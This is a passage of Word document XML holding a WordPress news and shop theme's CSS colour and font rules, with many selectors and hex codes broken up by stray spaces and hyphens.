      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DBAE8B" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC3BA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#mvp - wallpaper {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECEF1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background: url() no - repeat 50 % 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241245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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0A1F87" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B685C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#mvp - foot - copy a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0E2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color: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB4DD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64AB5461" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD0FA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content - main p a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B235A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.mvp - post - add - main p a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565677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box - shadow: inset 0 - 4 px 0 #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E33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5D730F3A" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="221C00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content - main p a: hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274781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post - add - main p a: hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E94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background: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF88F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20B31C2D" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124CA1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a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF32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a:visited,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAEED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.post-info-name a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC9D2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.woocommerce .woocommerce-breadcrumb a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAB1D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color: # 48 ff00;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9416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62366992" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7D02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#mvp - side - wrap a: hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E3F0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color: #48ff00;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7B9C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4A2EB1B0" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C637D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.mvp-fly-top:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA819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.mvp-vid-box-wrap,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB3D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ul.mvp-soc-mob-list li.mvp-soc-mob-com {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60604C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background: # ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697006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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B28FC3" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2241E6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nav.mvp - fly - nav - menu ul li.menu - item - has - children: after,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552F2B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feat1 - left - wrap span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB592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widget - feat1 - top - story span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B653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widget - feat2 - left - cont span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A44B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widget - dark - feat span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F1C0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widget - dark - sub span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6735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vid - wide - text span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E82FCD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feat2 - top - text span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229EF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feat3 - main - story span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD08B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feat3 - sub - text span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549474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feat4 - main - text span.mvp - cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4B68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- message: before,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E036D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- info: before,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348CF2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- message: before {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2E2C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color: #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C80F1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29BAC4AE" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1818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#searchform input,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206590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.mvp - authors - name {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B49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border - bottom: 1 px solid #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760210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48503FEB" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B102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fly - top: hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C8F3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border - top: 1 px solid #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06433B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border - left: 1 px solid #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B98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border - bottom: 1 px solid #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F24D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2A84ECA9" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4877DF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.woocommerce.widget_price_filter.ui - slider.ui - slider - handle,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D144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.woocommerce #respond input #submit.alt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47DA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a.button.alt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA030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button.button.alt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B66DC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input.button.alt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A03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#respond input #submit.alt: hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FEFB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a.button.alt: hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508B70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button.button.alt: hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61F8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input.button.alt: hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C33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background - color: #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9019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3F35B71F" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABEFF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- error,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C67FF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- info,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB98C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- message {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15623D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border - top - color: #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DEE3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25DC73F7" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1559A0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ul.mvp - feat1 - list - buts li.active span.mvp - feat1 - list - but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75CD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span.mvp - widget - home - title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04570B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span.mvp - post - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5537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span.mvp - feat1 - pop - head {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524EA8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background: #ff5900;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAAF1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6EEDB278" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE49B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 span.onsale {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7029C6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background - color: #ff5900;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBAD7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53E04C8D" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE58D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widget - feat2 - side - more - but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779C2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.woocommerce.star - rating span: before,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D44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span.mvp - prev - next - label,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A85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cat - date - wrap.sticky {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2702E9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color: #ff5900!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C9E3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1D29F581" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DBC12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#mvp - main - nav - top,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631810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#mvp - fly - wrap,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47C0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soc - mob - right,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A5BA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#mvp - main - nav - small - cont {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EBB7C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background: #ff8400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F67B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F56304" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE45F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#mvp - main - nav - small.mvp - fly - but - wrap span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432524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#mvp - main - nav - small.mvp - search - but - wrap span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E528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.mvp - nav - top - left.mvp - fly - but - wrap span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6089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#mvp - fly - wrap.mvp - fly - but - wrap span {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E76C05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background: #555555;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBCD9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73E8BB01" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425B0E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.mvp-nav-top-right .mvp-nav-search-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4339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span.mvp-fly-soc-head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400EB3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.mvp-soc-mob-right i,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF945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main - nav - small span.mvp - nav - search - but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF9CD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#mvp - main - nav - small.mvp - nav - menu ul li a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B28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color: #555555;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093127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3DC498D6" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A282C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main - nav - small.mvp - nav - menu ul li.menu - item - has - children a: after {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32512C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border - color: #555555 transparent transparent transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A32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40D47EDB" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3313778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nav - top - wrap span.mvp - nav - search - but: hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDDDD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#mvp - main - nav - small span.mvp - nav - search - but: hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3678CE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color: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A9D3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3518E93B" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B846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nav - top - wrap.mvp - fly - but - wrap: hover span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F87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#mvp - main - nav - small.mvp - fly - but - wrap: hover span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C58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span.mvp - woo - cart - num: hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092AC1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background: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483AC2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1143222E" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5782F5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main - nav - bot - cont {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560208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background: #ffffff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC46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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3721AE72" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222E27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#mvp - nav - bot - wrap.mvp - fly - but - wrap span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA59C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#mvp - nav - bot - wrap.mvp - search - but - wrap span {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CF4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background: #000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE335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2C9496CE" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6A1C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nav - bot - wrap span.mvp - nav - search - but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D529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#mvp - nav - bot - wrap.mvp - nav - menu ul li a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CABD7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color: #000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47851E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58E4F128" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620468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nav - bot - wrap.mvp - nav - menu ul li.menu - item - has - children a: after {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E35F9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border - color: #000000 transparent transparent transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A74E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4878D7C8" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EFAFD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.mvp-nav-menu ul li:hover a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD197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border-bottom: 5px solid # 0b e6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB3A5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E5E1AA" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680EF7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#mvp - nav - bot - wrap.mvp - fly - but - wrap: hover span {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2147F9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background: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C0A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3D2BB3AD" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5098CA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mvp - nav - bot - wrap span.mvp - nav - search - but: hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA6F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color: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758544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  <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1496D856" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F613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body,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705772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.mvp-feat1-feat-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C66C7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.mvp-feat2-top-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D11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.mvp-feat3-main-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E7E63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>.mvp-feat3-sub-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407679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># searchform input,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C26010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author - info - text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7902C2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post - excerpt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F67C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nav - menu ul li ul.sub - menu li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000FFD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nav.mvp - fly - nav - menu ul li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D75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ad - label,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022FA2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feat - caption,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787FB3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post - tags a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561B1D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post - tags a: visited,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693513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author - box - name a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AB2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author - box - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEB3C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post - gallery - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8ADF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ul.mvp - soc - mob - list li span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD41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#comments,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7F9F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h3 #reply - title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61144B7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h2.comments,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629F6A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foot - copy p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CDFC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fly - soc - head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CA8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post - tags - header,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308FBE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prev - next - label,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C23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post - add - link - but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C6CA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comments - button a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752219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comments - button span.mvp - comment - but - text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F24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ul.product_list_widget span.product - title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039F1A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ul.product_list_widget li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BDF5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#reviews #comments ol.commentlist li.comment - text p.meta,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5790F4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div.product p.price,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFAAC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div.product p.price ins,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB11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div.product p.price del,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06634A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ul.products li.product.price del,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34C6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ul.products li.product.price ins,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7A6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ul.products li.product.price,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAC51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#respond input #submit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCDC7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a.button,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5D25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button.button,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29669B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input.button,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607AFE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.woocommerce.widget_price_filter.price_slider_amount.button,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698304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span.onsale,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624A57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- review - link,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FE02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#woo - content p.woocommerce - result - count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B6B7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div.product.woocommerce - tabs ul.tabs li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6C0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a.mvp - inf - more - but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F133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cont - read - but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344995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cd - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060931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cd - date,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6D4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feat4 - main - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC25B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woo - cart - num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D85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widget - home - title2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B04FA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.wp - caption,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D87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content - main p.wp - caption - text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77192E7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.gallery - caption,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1852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post - add - main p.wp - caption - text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15D5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#bbpress - forums,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBAD5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#bbpress - forums p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469ABB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.protected - post - form input,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39271F5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feat6 - text p {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEA8D6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font - family: 'Roboto', sans - serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3F43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3F093C27" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605582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blog - story - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B797C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author - page - desc,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB45D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- 404 p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3886BD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widget - feat1 - bot - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24249F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widget - feat2 - left - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF880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flex - story - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77603F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search - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4272FC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content - main p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503BA9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post - add - main p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEF0B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.rwp - summary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9BCC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.rwp - u - review__comment,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010DD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feat5 - mid - main - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6210AB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feat5 - small - main - text p {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A38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font - family: 'PT Serif', sans - serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7646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236CA88B" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8AA6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nav - menu ul li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54206E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foot - menu ul li a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3583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font - family: 'Oswald', sans - serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0590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237D6AAF" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D728275" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
